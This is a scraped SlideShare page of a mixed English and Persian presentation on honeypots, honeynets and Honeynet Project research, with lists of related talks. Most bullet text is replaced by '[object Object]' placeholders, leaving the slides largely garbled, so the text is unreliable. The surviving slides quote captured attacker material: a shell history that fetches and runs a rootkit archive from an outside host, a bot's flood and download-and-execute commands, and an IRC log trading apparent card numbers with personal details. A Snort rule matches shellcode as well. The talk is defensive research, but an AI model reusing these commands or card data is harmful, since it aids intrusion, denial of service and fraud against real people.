SlideShare una empresa de Scribd logo
1 de 102
Honeypot New technology for the security community By Tahoora Ketabdar
Honeypots ,[object Object],[object Object],[object Object],[object Object]
IDS
Advantages ,[object Object],[object Object],[object Object],[object Object],[object Object]
Disadvantages ,[object Object],[object Object],[object Object]
Types ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Examples of Honeypots ,[object Object],[object Object],[object Object],[object Object],Low Interaction High Interaction
قابليت هاي  Honeypots ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Specter ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
ليست پورت هاي تحت نظارت  Specter شنود پورت . وقتي اتصالي به وسيله نفوذگر برقرار شد،اين اتصال مختوم   (Terminate)   شده و اطلاعات مربوط به آن  log  مي گردد . ,[object Object],[object Object],[object Object]
Specter  تا سقف  17  سيستم عامل رامي تواند   اميوليت كند ,[object Object],[object Object]
Specter Service's personality  ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Intelligence gathering by specter ,[object Object],[object Object]
Snapshot of the Specter GUI Alert box هر حمله اي كه رخ داد ليست ميشود Status Personality Remote log intelligence gathering help
someone scanning for and logging into anonymous FTP servers ,[object Object],[object Object]
از   Windows version of Snort   مي توان در كنار  Specter   بهره برد  ,[object Object],[object Object]
Honeyd specification  ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
 
[object Object],[object Object],[object Object],[object Object],[object Object]
فايل پيكربندي  Honeyd ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
فراخواني يك برنامه  RPC
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Passive Fingerprinting IP Packet
TCP Segment
04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604 TCP TTL:45 TOS:0x0 ID:56257 ***F**A* Seq: 0x9DD90553  Ack: 0xE3C65D7 Win: 0x7D78 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Linux Kernel 2.2X
Honeynets ,[object Object],[object Object],[object Object],[object Object]
How it works ,[object Object],[object Object],[object Object],[object Object],[object Object]
Honeynet Architecture
Data Control ,[object Object],[object Object],[object Object],[object Object],[object Object]
NIDS
No Data Control
Data Control
Snort-Inline alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";  alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";  replace: "| 0000   E8D7 FFFFFF|/ ben/sh ";)
Data Capture ,[object Object],[object Object],[object Object],[object Object]
Sebek ,[object Object],[object Object],[object Object]
Sebek Architecture
Alerting ,[object Object],[object Object],[object Object]
Honeywall CDROM ,[object Object],[object Object],[object Object]
Eeyore Problems ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Roo Honeywall CDROM ,[object Object],[object Object],[object Object],[object Object],[object Object]
Installation ,[object Object],[object Object],[object Object]
First Boot
Install
Configure
3 Methods to Maintain ,[object Object],[object Object],[object Object],[object Object]
Command Line Interface ,[object Object],[object Object],[object Object]
Dialog Menu
Data Administration
Data Analysis ,[object Object],[object Object],[object Object]
Walleye
Data Analysis
Data Analysis Flows
Data Analysis Details
Processes مي تواند تصوير گراف پروسه ها را نيز رسم كند
Files
Distributed Capabilities
Honeynets and  The Honeynet Project
 
 
Purpose ,[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object]
Honeynet Project
Problem ,[object Object]
Mission Statement ,[object Object]
Our Goal ,[object Object],[object Object],[object Object],[object Object]
Honeynet Project ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Honeynet Research Alliance ,[object Object],[object Object]
Alliance Members ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
The Threat
What we have captured ,[object Object],[object Object]
The Threat ,[object Object],[object Object],[object Object],[object Object],[object Object]
The Threat
The Motive ,[object Object],[object Object],[object Object]
DDoS for Money J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not  make money off of it? J4ck:   I know plenty of people that'd pay exorbatent  amounts for packeting
The Target ,[object Object],[object Object],[object Object]
Interesting Trends ,[object Object],[object Object],[object Object]
The Tools ,[object Object],[object Object],[object Object]
The Old Days Jan 8 18:48:12 HISTORY: PID=1246 UID=0  lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 HISTORY: PID=1246 UID=0  y Jan 8 18:48:45 HISTORY: PID=1246 UID=0  tar -xvfz LUCKROOT.TAR   Jan 8 18:48:59 HISTORY: PID=1246 UID=0  tar -xzvf Lu Jan 8 18:49:01 HISTORY: PID=1246 UID=0  tar -xzvf L Jan 8 18:49:03 HISTORY: PID=1246 UID=0  tar -xzvf LUCKROOT.TAR   Jan 8 18:49:06 HISTORY: PID=1246 UID=0  cd luckroot Jan 8 18:49:13 HISTORY: PID=1246 UID=0  ./luckgo 216 210 Jan 8 18:51:07 HISTORY: PID=1246 UID=0  ./luckgo 200 120 Jan 8 18:51:43 HISTORY: PID=1246 UID=0  ./luckgo 64 120 Jan 8 18:52:00 HISTORY: PID=1246 UID=0  ./luckgo 216 200
Botnets ,[object Object],[object Object],[object Object]
How They Work ,[object Object],[object Object],[object Object],[object Object]
80% of traffic ,[object Object],[object Object],[object Object],[object Object],[object Object]
Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled?
Numbers ,[object Object],[object Object],[object Object],[object Object],[object Object]
Botnet  Economy ,[object Object],[object Object],[object Object]
Phishing ,[object Object],[object Object],[object Object],[object Object]
The Sting
Getting the Info
Infrastructure ,[object Object],[object Object],[object Object],[object Object]
A Phishing Rootkit ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Credit Cards Exchanging 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA:  !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA:  !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
The Future ,[object Object],[object Object],[object Object]
Honeynets
Issues ,[object Object],[object Object],[object Object],[object Object]
Legal Contact for .mil / .gov ,[object Object],[object Object],[object Object],[object Object]
Learning More
Our Website ,[object Object],[object Object],[object Object],[object Object]
Our Book http://www.honeynet.org/book
Sponsoring YOU? Advanced Network Management Lab
How to Sponsor ,[object Object],[object Object],[object Object],[object Object],<project@honeynet.org> http://www.honeynet.org/funds/
Conclusion ,[object Object]
[object Object],[object Object]

Más contenido relacionado

La actualidad más candente

Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Access over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoEAccess over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoEamiable_indian
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewallsAkapo Damilola
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetDavid Sweigert
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsAndrew Case
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 
Ceh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingCeh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingAsep Sopyan
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowVi Tính Hoàng Nam
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersMehrdad Jingoism
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingAsep Sopyan
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemBikrant Gautam
 

La actualidad más candente (20)

Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
Access over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoEAccess over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoE
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewalls
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheet
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory Forensics
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
 
Database Firewall with Snort
Database Firewall with SnortDatabase Firewall with Snort
Database Firewall with Snort
 
snortinstallguide
snortinstallguidesnortinstallguide
snortinstallguide
 
Snort-IPS-Tutorial
Snort-IPS-TutorialSnort-IPS-Tutorial
Snort-IPS-Tutorial
 
Ceh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingCeh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijacking
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of service
 
Intro To Hacking
Intro To HackingIntro To Hacking
Intro To Hacking
 
Ceh v5 module 03 scanning
Ceh v5 module 03 scanningCeh v5 module 03 scanning
Ceh v5 module 03 scanning
 
Security tools
Security  toolsSecurity  tools
Security tools
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 

Destacado

Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...Kurt Kohn
 
Atlas de mortalidad y pérdidas económicas debido al clima OMM
Atlas de mortalidad y pérdidas económicas debido al clima OMMAtlas de mortalidad y pérdidas económicas debido al clima OMM
Atlas de mortalidad y pérdidas económicas debido al clima OMMhidrometeorologiaucv
 
Keep calm and carry on? Policy, psychology and the effects of 'economic war'
Keep calm and carry on? Policy, psychology and the effects of 'economic war'Keep calm and carry on? Policy, psychology and the effects of 'economic war'
Keep calm and carry on? Policy, psychology and the effects of 'economic war'Strategic Society Centre
 
Ementas da 4ª Mostra Gastronómica de Cacela
Ementas da 4ª Mostra Gastronómica de CacelaEmentas da 4ª Mostra Gastronómica de Cacela
Ementas da 4ª Mostra Gastronómica de Cacelapress.cmvrsa
 
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.sssukhov
 
Ringfeder schrumpfscheiben de-en-18_03_2013_b
Ringfeder schrumpfscheiben de-en-18_03_2013_bRingfeder schrumpfscheiben de-en-18_03_2013_b
Ringfeder schrumpfscheiben de-en-18_03_2013_bEuropages2
 
«Agile and Scrum scalability - theory and practice» by Helen Prykhnych
 «Agile and Scrum scalability - theory and practice» by Helen Prykhnych «Agile and Scrum scalability - theory and practice» by Helen Prykhnych
«Agile and Scrum scalability - theory and practice» by Helen PrykhnychDive_into_Management
 
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...Andrey Markin
 
Bosch Power Tools NA Partner Program
Bosch Power Tools NA Partner ProgramBosch Power Tools NA Partner Program
Bosch Power Tools NA Partner ProgramJonathan Laverentz
 
Curruculu Vitae - Andre Van Wyk
Curruculu Vitae - Andre Van WykCurruculu Vitae - Andre Van Wyk
Curruculu Vitae - Andre Van WykAndre van Wyk
 
Slide Show Trevor Vuorenmaa #ENT3976
Slide Show Trevor Vuorenmaa #ENT3976Slide Show Trevor Vuorenmaa #ENT3976
Slide Show Trevor Vuorenmaa #ENT3976Trevor Vuorenmaa
 
Grammaticus (Carolus Cabanillas auctor)
Grammaticus (Carolus Cabanillas auctor)Grammaticus (Carolus Cabanillas auctor)
Grammaticus (Carolus Cabanillas auctor)Óscar Ramos
 
From Philippine Red Cross-BTC Module 1
From Philippine Red Cross-BTC Module 1From Philippine Red Cross-BTC Module 1
From Philippine Red Cross-BTC Module 1Edmund Villareal
 
High Quality Software Development with Agile and Scrum
High Quality Software Development with Agile and ScrumHigh Quality Software Development with Agile and Scrum
High Quality Software Development with Agile and ScrumLemi Orhan Ergin
 

Destacado (16)

Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
 
Atlas de mortalidad y pérdidas económicas debido al clima OMM
Atlas de mortalidad y pérdidas económicas debido al clima OMMAtlas de mortalidad y pérdidas económicas debido al clima OMM
Atlas de mortalidad y pérdidas económicas debido al clima OMM
 
Keep calm and carry on? Policy, psychology and the effects of 'economic war'
Keep calm and carry on? Policy, psychology and the effects of 'economic war'Keep calm and carry on? Policy, psychology and the effects of 'economic war'
Keep calm and carry on? Policy, psychology and the effects of 'economic war'
 
Ementas da 4ª Mostra Gastronómica de Cacela
Ementas da 4ª Mostra Gastronómica de CacelaEmentas da 4ª Mostra Gastronómica de Cacela
Ementas da 4ª Mostra Gastronómica de Cacela
 
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
 
Ringfeder schrumpfscheiben de-en-18_03_2013_b
Ringfeder schrumpfscheiben de-en-18_03_2013_bRingfeder schrumpfscheiben de-en-18_03_2013_b
Ringfeder schrumpfscheiben de-en-18_03_2013_b
 
«Agile and Scrum scalability - theory and practice» by Helen Prykhnych
 «Agile and Scrum scalability - theory and practice» by Helen Prykhnych «Agile and Scrum scalability - theory and practice» by Helen Prykhnych
«Agile and Scrum scalability - theory and practice» by Helen Prykhnych
 
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
 
Bosch Power Tools NA Partner Program
Bosch Power Tools NA Partner ProgramBosch Power Tools NA Partner Program
Bosch Power Tools NA Partner Program
 
Aofog news letter
Aofog news letterAofog news letter
Aofog news letter
 
Curruculu Vitae - Andre Van Wyk
Curruculu Vitae - Andre Van WykCurruculu Vitae - Andre Van Wyk
Curruculu Vitae - Andre Van Wyk
 
Slide Show Trevor Vuorenmaa #ENT3976
Slide Show Trevor Vuorenmaa #ENT3976Slide Show Trevor Vuorenmaa #ENT3976
Slide Show Trevor Vuorenmaa #ENT3976
 
Grammaticus (Carolus Cabanillas auctor)
Grammaticus (Carolus Cabanillas auctor)Grammaticus (Carolus Cabanillas auctor)
Grammaticus (Carolus Cabanillas auctor)
 
From Philippine Red Cross-BTC Module 1
From Philippine Red Cross-BTC Module 1From Philippine Red Cross-BTC Module 1
From Philippine Red Cross-BTC Module 1
 
User stories
User storiesUser stories
User stories
 
High Quality Software Development with Agile and Scrum
High Quality Software Development with Agile and ScrumHigh Quality Software Development with Agile and Scrum
High Quality Software Development with Agile and Scrum
 

Similar a Honeynet Project View

All About Snort
All About SnortAll About Snort
All About Snort28pranjal
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptcemporku
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdftehkotak4
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHackingAve Nawsh
 
Module 5 Sniffers
Module 5  SniffersModule 5  Sniffers
Module 5 Sniffersleminhvuong
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkAnimesh Roy
 
An Approach to for Improving the Efficiency of IDS System Using Honeypot
An Approach to for Improving the Efficiency of IDS System Using HoneypotAn Approach to for Improving the Efficiency of IDS System Using Honeypot
An Approach to for Improving the Efficiency of IDS System Using HoneypotEditor Jacotech
 
8 steps to protect your cisco router
8 steps to protect your cisco router8 steps to protect your cisco router
8 steps to protect your cisco routerIT Tech
 
Internet security
Internet securityInternet security
Internet securitygohel
 
Networking question
Networking questionNetworking question
Networking questionDEVBEJ
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameJaime Sánchez
 
Module 3 Scanning
Module 3   ScanningModule 3   Scanning
Module 3 Scanningleminhvuong
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N NessusUtkarsh Verma
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes  Certified Ethical HackerCEH v9 cheat sheet notes  Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical HackerDavid Sweigert
 
Cyber_Threat_Intelligent_Cyber_Operation_Contest
Cyber_Threat_Intelligent_Cyber_Operation_ContestCyber_Threat_Intelligent_Cyber_Operation_Contest
Cyber_Threat_Intelligent_Cyber_Operation_Contestnkrafacyberclub
 

Similar a Honeynet Project View (20)

Snort- Presentation.pptx
Snort- Presentation.pptxSnort- Presentation.pptx
Snort- Presentation.pptx
 
All About Snort
All About SnortAll About Snort
All About Snort
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.ppt
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHacking
 
OS Fingerprinting
OS FingerprintingOS Fingerprinting
OS Fingerprinting
 
Module 5 Sniffers
Module 5  SniffersModule 5  Sniffers
Module 5 Sniffers
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit Framework
 
1376841709 17879811
1376841709  178798111376841709  17879811
1376841709 17879811
 
An Approach to for Improving the Efficiency of IDS System Using Honeypot
An Approach to for Improving the Efficiency of IDS System Using HoneypotAn Approach to for Improving the Efficiency of IDS System Using Honeypot
An Approach to for Improving the Efficiency of IDS System Using Honeypot
 
1376841709 17879811
1376841709  178798111376841709  17879811
1376841709 17879811
 
8 steps to protect your cisco router
8 steps to protect your cisco router8 steps to protect your cisco router
8 steps to protect your cisco router
 
Internet security
Internet securityInternet security
Internet security
 
Internet security
Internet securityInternet security
Internet security
 
Networking question
Networking questionNetworking question
Networking question
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse game
 
Module 3 Scanning
Module 3   ScanningModule 3   Scanning
Module 3 Scanning
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N Nessus
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes  Certified Ethical HackerCEH v9 cheat sheet notes  Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical Hacker
 
Cyber_Threat_Intelligent_Cyber_Operation_Contest
Cyber_Threat_Intelligent_Cyber_Operation_ContestCyber_Threat_Intelligent_Cyber_Operation_Contest
Cyber_Threat_Intelligent_Cyber_Operation_Contest
 

Último

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 

Último (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
